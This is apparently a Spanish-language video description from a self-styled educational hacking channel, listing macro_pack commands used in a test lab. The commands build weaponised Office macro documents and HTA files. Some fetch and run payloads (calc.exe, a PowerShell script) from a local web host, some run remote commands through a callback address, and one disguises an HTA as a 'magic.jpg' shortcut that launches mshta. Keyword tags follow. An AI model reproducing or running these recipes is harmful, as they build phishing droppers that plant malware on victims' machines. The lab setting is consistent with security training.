Disclaimer / Descargo de responsabilidad: este canal es estrictamente educativo para aprender sobre ciberseguridad

LABORATORIO de PRUEBA

COMANDOS LINKS IMPORTANTES
Código: Seleccionar todo
echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xsl
echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xlsm xx
echo "http://192.168.1.145:7777" "dir /Q C:" | macro_pack.exe -t REMOTE_CMD -o -G cmd.doc xx
echo "http://192.168.1.145:7777" "ipconfig" | macro_pack.exe -t REMOTE_CMD -o -G cmd2.doc xx
echo "http://192.168.1.145/calc.exe" | macro_pack.exe -t DROPPER -o -G prueba.xlsm xx
echo "http://192.168.1.145/videoplayback.mp4" | macro_pack.exe -t DROPPER -o -G prueba2.xlsm xx
echo "http://192.168.1.145/calc.exe" C:\Users\roger | macro_pack.exe -t DROPPER -o -G prueba77.xlsm
echo "http://192.168.1.145/videoplayback.mp4" C:\Users\roger\video.mp4 | macro_pack.exe -t DROPPER -o -G prueba7fsd64.xlsm
echo "http://192.168.1.145/ejemplo.ps1" | macro_pack.exe -t DROPPER_PS -o -G test4rerdeo.xlsm
echo "magic.jpg" | macro_pack.exe -t EMBED_EXE -e magic.jpg -o -G magic_dropper.hta
%windir%\System32\mshta.exe E:\videos\2022\segundatanda\videos\decimo\macro\macro_pack-1.5\magic.jpg.lnk
%windir%\system32\shell32.dll
copy /b magic.jpg.lnk+magic_dropper.hta magic.jpg.lnk
http://blog.sevagas.com/?Hacking-around-HTA-files
https://blog.sevagas.com/?Advanced-Macr ... -Injection
VIDEO TUTORIAL
Pentesting synology xpenology Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell backdoor LAN | Local Area Network CMD execution RFI LFI How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Macro Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad sistemas de detección de intrusos Networking Word Excel PowerPoint Access Visio Project MS office DCOM7 Shortcut macropack,Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,como usar kali linux,comandos,commands,remote function,metasploit,programa informatico,mobile,visual basic,acesso directo,java